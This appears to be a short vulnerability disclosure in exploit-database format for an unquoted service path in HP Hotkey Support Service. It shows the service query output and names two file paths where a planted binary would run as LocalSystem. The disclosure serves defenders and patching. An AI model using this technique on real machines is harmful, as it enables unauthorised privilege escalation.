# Exploit Title: [HP Hotkey Support Service - Unquoted Service Path Privilege Escalation]
# Date: [date]
# Exploit Author: [Owais Mehtab, Tayeeb Rana]
# Vendor Homepage: [http://www.hp.com/]
# Software Link: [http://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_129672_1]
# Version: [6.2.17.1]
# Tested on: [Win7 Sp1]

C:\>sc qc "HP Hotkey Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: HP Hotkey Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : D:\Program Files (x86)\HP\HP Hotkey Support\HotkeyService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : HP Hotkey Service
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

An attacker can place binaries in following locations to execute it under LocalSystem account since the binary path is not in double quotes

D:\Program.exe
D:\Program Files (x86)\HP\HP.exe